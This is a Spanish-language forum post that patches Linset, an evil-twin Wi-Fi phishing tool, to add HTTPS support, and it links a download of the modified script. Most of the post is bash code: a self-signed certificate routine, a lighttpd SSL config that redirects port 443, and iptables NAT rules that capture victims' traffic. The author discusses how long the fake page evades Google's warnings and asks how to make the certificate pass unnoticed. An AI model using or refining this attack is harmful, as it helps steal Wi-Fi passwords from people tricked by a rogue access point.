bueno ya que kdctv ha tenido paciencia y no se ha reido de mi con lo de crear certificados ssl ; hay que pagar para crear uno que google no lo detecte como malo ademas de validarlo …
openssl req -subj '/CN=SEGURO/O=SEGURA/OU=SEGURA/C=US' -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout $DUMP_PATH/server.pem -out $DUMP_PATH/server.pem.
creo que esta bien le dice crea certificado atuofirmado con clave de 2o48 bits con permanencia de 1 año y que la de en formato pem y que las guarde en las carpetas corespondientes
muestro lo poco que he llegado a hacer mostrando como he añadido lo de la creacion de los ssl para si alguien ve algo en lo que pueda dar luz o simplemente jugar a romper scripts ya que no tiene otro nombre :D; de primeras no canta mucho te da 2 intentos o tres hasta que salta google que lo detecta la victima volvera a cerrar el navegador volvera a abrirlo y 2 intentos mas sin que ggogle lo detecte … pero no es valido para android ya que los moviles no abren nueva pestaña en el buscador tampoco funciona como es debido en wifislax 4.11.1 pero si en la 4.9
http://s16.postimg.org/tzwwkz291/Screen_Shot_20150811115741.png
como ven enseño la primera que da ggole acto seguido como se ve abre pestaña con el index de linset
http://s9.postimg.org/nciykvm73/Screen_Shot_20150811115930.png
esta es la que canta aun asi se ve que ha abierto nueva pestaña con el index a la que nos redireciona nos saltaria el index y quedaria debajo la pestaña que canta lo mismo que la captura anterior
1 Añadimos las dependencias de zenity y openssl para añadir soporte https y poder crear certificado ssl ya que linset 0.14 no las tiene
vamos al apartado y le añadimos al final veran por logica donde iran ya que veran que les falta zenity y openssl
en # Comprueba la existencia de todas las dependencias al final añadir
[code] echo -ne “Zenity…”
if ! hash zenity 2>/tmp/null; then
echo -e “\e[1;31mNot installed”$rescolor""
salir=1
else
echo -e “\e[1;32mOK!”$rescolor""
fi
sleep 0.025
echo -ne "Openssl..........."
if ! hash openssl 2>/tmp/null; then
echo -e "\e[1;31mNot installed"$rescolor""
salir=1
else
echo -e "\e[1;32mOK!"$rescolor""
fi
sleep 0.025
if [ "$salir" = "1" ]; then
exit 1
fi
sleep 1
clear
}
mostrarheader
checkdependences[/code]
2 añadimos unas lineas en el apartado metodo de comprobacion de pass (en linset 0.14 o cualquier version )
Metodo de comprobacion de PASS si elegiste airbase-ng
[code]# Metodo de comprobacion de PASS si elegiste airbase-ng
function askauth {
conditional_clear
mostrarheader
while true; do
echo "METODO DE VERIFICACIÓN DE PASS"
echo " "
echo -e " "$verde"1)"$rescolor" Handshake ("$rojo"Recomendado"$rescolor")"
echo -e " "$verde"2)"$rescolor" wpa_supplicant (Menos efectivo / Mas fallos)"
echo -e " "$verde"3)"$rescolor" Atras"
echo -e " "$verde"4)"$rescolor" Salir" (añadimos linea opcion 4)
echo -n " #> "
read yn
echo ""
case $yn in
1 ) authmode="handshake"; deauthforce; break ;;
2 ) authmode="wpa_supplicant"; certssl; break ;; ( sustituimos linea = 2 ) authmode="wpa_supplicant"; certssl; break ;; )
3 ) askAP; break ;;
4 ) exitmode ; break ;; (añadimos linea opcion 4)
* ) echo "Opción desconocida. Elige de nuevo"; conditional_clear ;;
esac
done
} [/code]
3 en comprueba en hanskake antes de continuar
[code]# Comprueba el handshake antes de continuar
function checkhandshake {
if “$handshakemode” = “normal” ]; then
if aircrack-ng $DUMP_PATH/$Host_MAC-01.cap | grep -q “1 handshake”; then
killall airodump-ng &>$linset_output_device
certssl --------------------------------- (linea cambiada )
break
else
Handshake_statuscheck=“${rojo}Malo$rescolor”
fi
elif “$handshakemode” = “hard” ]; then
cp $DUMP_PATH/$Host_MAC-01.cap $DUMP_PATH/test.cap &>$linset_output_device
if pyrit -r $DUMP_PATH/test.cap analyze 2>&1 | grep -q "good,"; then
killall airodump-ng &>$linset_output_device
certssl --------------------------------- (linea cambiada )
break
else
if aircrack-ng $DUMP_PATH/$Host_MAC-01.cap | grep -q "1 handshake"; then
Handshake_statuscheck="${amarillo}Corrupto$rescolor"
else
Handshake_statuscheck="${rojo}Malo$rescolor"
fi
fi
rm $DUMP_PATH/test.cap &>$linset_output_device
fi
deauthMENU
}[/code]
[code]function deauthMENU {
Handshake_statuscheck="${gris}Sin handshake$rescolor"
while true; do
conditional_clear (eliminamos linea )
mostrarheader (eliminamos linea )
echo "¿SE CAPTURÓ el HANDSHAKE?"
echo
echo -e "Estado del handshake: $Handshake_statuscheck"
echo
echo -e " "$verde"1)"$rescolor" Si"
echo -e " "$verde"2)"$rescolor" No (lanzar ataque de nuevo)"
echo -e " "$verde"3)"$rescolor" No (seleccionar otro ataque)"
echo -e " "$verde"4)"$rescolor" Seleccionar otra red"
echo -e " "$verde"5)"$rescolor" Salir"
echo " "
echo -n ' #> '
read yn
case $yn in
1 ) checkhandshake;;
2 ) capture; $DEAUTH & ;;
3 ) conditional_clear; askclientsel; break;;
4 ) killall airodump-ng &>$linset_output_device; CSVDB=dump-01.csv; breakmode=1; selection; break ;;
5 ) exitmode; break;;
* ) echo "Opción desconocida. Elige de nuevo"; conditional_clear ;;
esac
done
}[/code]
4 añadimos la creacion de certificados antes de entre ataque y hanskake copiar y pegar todo como esta
[code]############################################# < CERTIFICADO SSL (Indispensable para el soporte ssl (https) ) > ############################################
function certssl
{
#Verifica que exista el certificado ssl autofirmado y que sea correcto
if -f $DUMP_PATH/server.pem ]
then
if -s $DUMP_PATH/server.pem ]; then
webinterface
break
else
echo "se crea cerificado"
echo
echo
echo -e " "$verde"1)"$rescolor" Crear Certificado ssl"
echo -e " "$verde"2)"$rescolor" Buscar de nuevo el Certificado ssl"
echo -e " "$verde"3)"$rescolor" Salir"
echo " "
echo -n ' #> '
read yn
case $yn in
1 ) creassl;;
2 ) certssl;break;;
3 ) exitmode; break;;
* ) certssl ;;
esac
fi
else
while true; do
echo "verifica y crea"
echo
echo
echo -e " "$verde"1)"$rescolor" Crear Certificado ssl"
echo -e " "$verde"2)"$rescolor" Buscar de nuevo el Certificado ssl"
echo -e " "$verde"3)"$rescolor" Salir"
echo " "
echo -n ' #> '
read yn
case $yn in
1 ) creassl;;
2 ) certssl;break;;
3 ) exitmode; break;;
* )certssl ;;
esac
done
fi
}
#Crea el Certificado ssl Autofirmado
function creassl
{
xterm -title "Creando Certificado ssl Autofirmado" -e openssl req -subj '/CN=SEGURO/O=SEGURA/OU=SEGURA/C=US' -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout $DUMP_PATH/server.pem -out $DUMP_PATH/server.pem
certssl
}
############################################# < CERTIFICADO SSL (Indispensable para el soporte ssl (https) ) > ############################################[/code]
justo debajo en ataque establecemos permisos al servidor permanente en ataque
[code]############################################# < ATAQUE > ############################################
Selecciona interfaz web que se va a usar
function webinterface {
#Establece Permisos al Certificado ssl Autofirmado |lineas modificadas o añadidas |
chmod 400 $DUMP_PATH/server.pem |lineas modificadas o añadidas |
while true; do [/code]
En se crea el configurador del servidor web Lighttpd
[code]# Se crea el config del servidor web Lighttpd (Aqui se establece el soporte https (ssl) y redireccionamiento a http)
echo "server.document-root = "$DUMP_PATH/data/" (data direccion añadida si ya la teneis lo vereis)
server.modules = (
"mod_access",
"mod_alias",
"mod_accesslog",
"mod_fastcgi",
"mod_redirect",
"mod_rewrite"
)
fastcgi.server = ( ".php" => ((
"bin-path" => "/usr/bin/php-cgi",
"socket" => "/php.socket"
)))
server.port =80
server.pid-file = "/var/run/lighttpd.pid"
server.username = "www"
server.groupname = "www"
mimetype.assign = (
".html" => "text/html",
".htm" => "text/html",
".txt" => "text/plain",
".jpg" => "image/jpeg",
".png" => "image/png",
".css" => "text/css"
)
server.error-handler-404 = "/"
static-file.exclude-extensions = ( ".fcgi", ".php", ".rb", "~", ".inc" )
index-file.names = ( "index.htm" )
$SERVER"socket"] == ":443" { (añadimos redireccionamiento )
url.redirect = ( "^/(.*)" => "http://www.internet.com") (podeis inventar la pagina )
ssl.engine = "enable"
ssl.pemfile = "$DUMP_PATH/server.pem"
}
" >$DUMP_PATH/lighttpd.con[/code]
el la sigiuente direcion añadimos redirecionamiento al puerto 443
[code]# Prepara las tablas de enrutamiento para establecer un servidor DHCP/WEB
function routear {
ifconfig $interfaceroutear up
ifconfig $interfaceroutear $IP netmask 255.255.255.0
route add -net $RANG_IP.0 netmask 255.255.255.0 gw $IP
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $IP:80
iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination $IP:443 (añadida)
iptables -A INPUT -p tcp --sport 443 -j ACCEPT (añadida)
iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT (añadida)
iptables -t nat -A POSTROUTING -j MASQUERADE
}[/code]
eso es todo no intento dar lecciones ;me las tendrian que dar a mi ;lo hago con toda humildad para demostrar que he echo lo que he podido en mi corto conocimiento me encantaria que se hicieran comentarios acerca de como se podria crear un ssl que no cante ya que yo no …
perdon por el toston si quieren o no le ven nada provechoso lo pueden borrar solo queria compartir a lo poco que he llegado
gracias a mx kukulkan por dejar un script tan claro diciendo donde va cada cosa para el ssl
y como no al creador de script vk496
Lo dicho solo funciona correctamente en wifislax 4.9 Para aquellos que han sabido leer detenidamente el post
chmod /root/Desktop/linset1
/root/Desktop/linset1
https://mega.nz/#!WIR3QDwL!Lzyf07ISqWgQTwE14i8GuusKkllwAGH3yh2xcp2JTz8
salu2